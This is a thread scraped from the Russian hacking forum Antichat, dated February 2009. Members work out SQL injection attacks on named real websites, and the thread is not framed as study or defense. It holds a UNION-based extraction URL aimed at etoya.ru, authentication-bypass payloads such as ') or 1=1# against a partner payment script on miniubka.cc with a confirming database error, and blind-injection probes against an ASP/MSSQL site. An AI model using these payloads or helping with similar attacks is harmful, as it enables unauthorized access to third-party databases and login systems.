ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
23.02.2009, 13:27
|
|
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874
Репутация:
1020
|
|
Сообщение от it's mу
Вообще-то символ # обозначает комментарий до конца строки в MySQL, а мой запрос в прошлом посте был вида: pass&apos) or 1=1#'
Вообще-то символ # прокатывает далеко не везде, а вообще что бы ни заниматься гаданием не плохо бы линк в студию.
|
|
|
23.02.2009, 13:29
|
|
Banned
Регистрация: 12.02.2009
Сообщений: 73
Провел на форуме:
175651
Репутация:
171
|
|
я думаю привел достаточно информации, так что думаю можно обойтись без линка  |
|
|
|
23.02.2009, 13:42
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
Сообщение от Shadow6120
У меня при запросе, напр
вылазит ошибка
замена "+" на пробел или /**/ не помогла
Линк в студию.
|
|
|
|
23.02.2009, 13:51
|
|
Новичок
Регистрация: 26.12.2008
Сообщений: 16
Провел на форуме:
196900
Репутация:
16
|
|
Сообщение от R1dex
Линк в студию.
Не хачу  т.к. сайт оч крутойи если скажу скорее всего прикроют
Последний раз редактировалось Shadow6120; 23.02.2009 в 13:55..
|
|
|
|
23.02.2009, 14:43
|
|
Познающий
Регистрация: 22.02.2006
Сообщений: 50
Провел на форуме:
256744
Репутация:
16
|
|
http://www.etoya.ru/search/?text=lol')+group+by+26/*
нук у кого получится раскрутить что то у меня не получается
|
|
|
|
23.02.2009, 15:19
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
it's mу не знаю какому чудо программеру потребовалось написать такой код, но пусть это останится на его совести:
(pwd = '$pass' or pwd = '$pass' or pwd = '$pass')
Опять-же функцию ты написал от фонаря, и единственное, что извесно точно, это этот чудесный запрос, и то, что ковычка заменяется на "\"(это по ошибкам мускула)
При таком раскладе ты ничего не сделаешь т.к. ковычку необходимую для закрытия ты не получишь.
НО ! Т.к функция замены символов тобою выдумана, и достоверно мы не знаем, что там за код, могут быть варианты.
Ну и конечно, если всё-же в чудо запросе участвует ещё одна переменная, и тогда тоже есть варианты например так:
(user_password='$pass' or user_name='$name')
pass='&name=)+or+1=1/*
И тогда проходим авторизацию
(user_password='\' or user_name=')+or+1=1/*')
Но это ,я думаю, ты и сам понимаешь
И кстати, насчёт # AkyHa_MaTaTa прав, тогда уж %23
=====================
Сообщение от m0use
нук у кого получится раскрутить что то у меня не получается
Нук, почитай статьи , и на запрос внимательно посмотри, он весь в ошибке.
http://www.etoya.ru/search/?text=-11')+group+by+1+union+select+1,2,3,4,version(),6,7 ,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5,26,27/*
|
|
|
|
23.02.2009, 15:31
|
|
Banned
Регистрация: 12.02.2009
Сообщений: 73
Провел на форуме:
175651
Репутация:
171
|
|
jokester там нет второй переменной, исходя из твоего поста и моих соображений, то навряд-ли что-то можно сделать в данной ситуации на счет функции ReRe её я сделал что бы показать какие символы на что меняются, т.е. логически исходя из моего поста, в твой запрос pass='&name=)+or+1=1/* неверен, ни по символам, ни по ситуации, так как переменная одна. Для просящих все таки выложу ссылочку, может быть кто-то умнее меня miniubka.cc/pay1.php?partner=2&video=index.php
|
|
|
|
23.02.2009, 15:50
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893
Репутация:
2163
|
|
у меня сайт не пингуется, но если передать переменной значение вида ) or 1=1#', должен получится верный запрос (прошу проверить):
SELECT * FROM passwords where (pwd = ') or 1=1#\' or pwd = ') or 1=1#\') or pwd = ' or 1=1#\') and dateend>='1235374381'
/add
и достоверно мы не знаем, что там за код, могут быть варианты.
имхо в запрос попадает &apos (в html &apos а при просмотре ')
/add2
Shadow6120, линк в студию/пм
Последний раз редактировалось l1ght; 23.02.2009 в 15:57..
|
|
|
|
23.02.2009, 16:00
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
l1ght Бинго, вы перешли на второй уровень 
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '') or 1=1#\'' at line 1
SELECT * FROM partner_access where partner='2' and pwd=') or 1=1#\'
|
|
|
|
24.02.2009, 00:10
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Есть сайт на асп(судя по всему MSSQL  ), ощибки базы данных не выводятся... но есть слепая инъекция, как я думаю.
script.asp?id=853 - контент показывается
script.asp?id=853' - контент не показывается
script.asp?id=853+order+by+8-- - подобрал колонки, их восемь.
script.asp?id=853+union+select+null,null,null,null ,null,null,null,null-- ничего не выводиться, в том числе контент.
Как быть с этим? Подбирать тип колонок вручную? или что то еще можно?
И вообще, правильно ли я рассуждал? |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
